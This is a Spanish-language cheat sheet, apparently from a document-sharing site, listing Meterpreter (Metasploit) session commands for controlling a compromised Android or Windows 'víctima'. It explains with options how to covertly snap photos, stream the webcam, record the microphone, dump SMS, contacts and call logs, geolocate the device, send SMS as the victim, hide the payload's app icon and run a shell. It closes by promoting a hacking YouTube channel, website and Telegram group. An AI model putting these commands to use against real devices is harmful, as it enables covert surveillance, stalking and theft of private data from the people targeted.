Está en la página 1de 8

Comandos dentro de

una sesion
meterpreter
Este es un listado de algunos
comandos disponibles dentro de la
ejecución de una sesión en
meterpreter del framework de
metasploit.
Los comandos, en su mayoría van
acompañados de una opción y una
función, ejemplo:

webcam_snap –i 1 –o /storage/emulated/o/foto.jpeg

webcam_snap == Comando que llama a la captura de una


imagen por medio de la cámara del dispositivo.

-i == Opción para definir la interfaz o la cámara


trasera o frontal con la que se desea obtener la
captura.

-o == Ruta a la cual se le asigna, alojar la imagen


capturada, se debe establecer el nombre de la imagen
con extensión .jpeg
Comando Argumento Función
Help o ? Despliega el listado de
--------- comandos disponibles en la
sesión.
Ejecuta la sesión actual en
Background --------- segundo plano y regresa a
‘msf >’
Muestra el tiempo sobre la
get_timeouts --------- sesión en ejecución
Muestra el ID del
getuid --------- dispositivo de la víctima.
Ejecuta una Shell de Ruby.
irb ---------
Termina la sesión de
quit o exit --------- meterpreter
Intercambia sesiones
sessions -i activas y gestiona varios
dispositivos a la vez.
-i para establecer el ID de
la sesión a ingresar.
Lee un archivo o fichero.
cat --------
Navega entre los
cd -------- directorios disponibles.
Copiar archivos.
cp -r -r para una copia recursiva
de directorios.
Muestra el directorio donde
pwd ------- se está.
Obtiene la lista de los
ls ------- archivos y directorios
existentes en la ruta
asignada
Crea directorios.
mkdir -------
Para mover o reemplazar
mv ------- archivos.
Elimina archivos.
rm -rf -rf para eliminar
directorios completos
Buscar archivos
search -------
Sube o integra archivos
upload -------- desde el dispositivo
atacante al de la víctima.
Descarga archivos desde el
download -r dispositivo víctima para
almacenarse en el
dispositivo del atacante.
-r Para descargar
directorios completos.
Muestra la lista de
ifconfig -------- interfaces y sus
conexiones.
Muestra la lista de
ipconfig -------- interfaces y sus
conexiones.
Redirecciona un puerto
portfwd -------- local a un servicio remoto.
Muestra la hora y fecha que
localtime -------- se tiene en el dispositivo
víctima.
Despliega la lista de
ps -------- procesos en ejecución en el
dispositivo víctima.
Ejecuta una terminal de
shell -------- comandos Shell dentro del
dispositivo víctima.
Muestra la información
sysinfo -------- sobre el sistema operativo,
arquitectura, etc... Que
tiene el dispositivo
víctima.
Muestra la pantalla de la
screenshare --------- víctima en tiempo real (No
funciona en todos los
dispositivos)
Toma una captura de
screenshoot -p –q -v pantalla en el dispositivo
víctima.
-p establece la ruta donde
se alojará la captura
-q establece la calidad de
la captura.
-v para mostrar la captura
automáticamente.
Grabar audio por medio del
record_mic -d –f -p micrófono del dispositivo
víctima.
-d para establecer el
número de segundos a
grabar. –f para establecer
la ruta donde se almacenará
el audio.wav –p para
reproducir el archivo de
audio automáticamente.
Establecer un videochat con
Webcam_chat -s la víctima.
-s para establecer el
server.

Muestra el listado de
Webcam_list -------- cámaras disponibles en el
dispositivo víctima.
Captura de una imagen por
Webcam_snap -i –p –q medio de la cámara del
-v dispositivo. –i para
definir la interfas de la
cámara a usar. –p para
definir la ruta donde se
almacenará la imagen.jpeg.
–q para definir la calidad
de la captura. –v para
mostrar la imagen
automáticamente.
Adquirir video en tiempo
Webcam_stream -d –i –q real, por medio de la
–s –t -v cámara del dispositivo
víctima. –d para establecer
la duración del video. –i
para establecer la cámara
con la cual se desea grabar
el video. -q para
establecer la calidad del
video. –s para establecer
la ruta de almacenamiento
del video. –t para
establecer la ruta del
reproductor del video.html.
–v para reproducir el video
automáticamente.
Reproduce un archivo de
play -------- audio desde el dispositivo
del atacante, en el
dispositivo de la victima.
Verifica si la víctima
check_root -------- tiene acceso root.
Extrae la lista de todas
dump_calllog -o las llamadas recibidas,
enviadas y perdidas en un
documento .txt. –o para
definir la ruta donde se
almacenará el archivo.txt
Extrae la lista de
dump_contacts -f -o contactos de el dispositivo
víctima. –f Para establecer
el formato de la lista de
contactos “.txt, .csv,
.vcard”. –o para establecer
la ruta donde se almacenará
el archivo.
Extrae los mensajes de
dump_sms -o texto recibidos y enviados
por la víctima. –o para
establecer la ruta donde se
almacenará el archivo.txt
Consultar la ubicación
geolocate -g exacta del dispositivo
víctima. –g la ubicación se
muestra en un mapa generado
por google maps
Esconde el icono del
hide_app_icon ------- payload de la bandeja de
aplicaciones en el
dispositivo víctima.
Enviar sms desde el
send_sms -d –r -t dispositivo de la víctima.
–d para establecer el
número del destinatario, -r
para esperar por la
confirmación del envío. –t
para definir el cuerpo del
mensaje a enviar.
Definir el volumen general
set_audio_mode -m del dispositivo víctima. –m
(0) silencio (1) Normal-
medio (2) Máximo
Apagar o encender la
wakelock -r -w pantalla del dispositivo
víctima. –r para desactivar
wakelock. -w para–mantener
encendida la pantalla.
Obtiene la ubicación
wlan_geolocate -a aproximada del dispositivo
víctima, mediante su
conexión wifi. –a para
establecer el API key
necesario para usar esta
función.
Instalar aplicación desde
app_install ------ el dispositivo del atacante
al de la víctima, “requiere
confirmación de la victima”
Muestra la lista de
app_list ------ aplicaciones instaladas en
el dispositivo víctima.
Inicia la actividad
app_run ------ principal de cualquier
aplicación instalada en el
dispositivo víctima.
Desinstala una aplicación
app_uninstall ------- del dispositivo de la
víctima. “Requiere
confirmación por parte de
la víctima”
La mayoría de los comandos, son
funcionales tanto en Android como
en Windows.

Te invito a suscribirte a mi canal


en YouTube:
https://www.youtube.com/channel/UCd5n5V06sYUXmWnDTZo7UGQ

Visita mi página para obtener


contenido sobre informática y
hacking:
https://informaticayhacking.cf/

Únete a nuestro grupo en Telegram:


https://t.me/Informatica_y_Hacking

También podría gustarte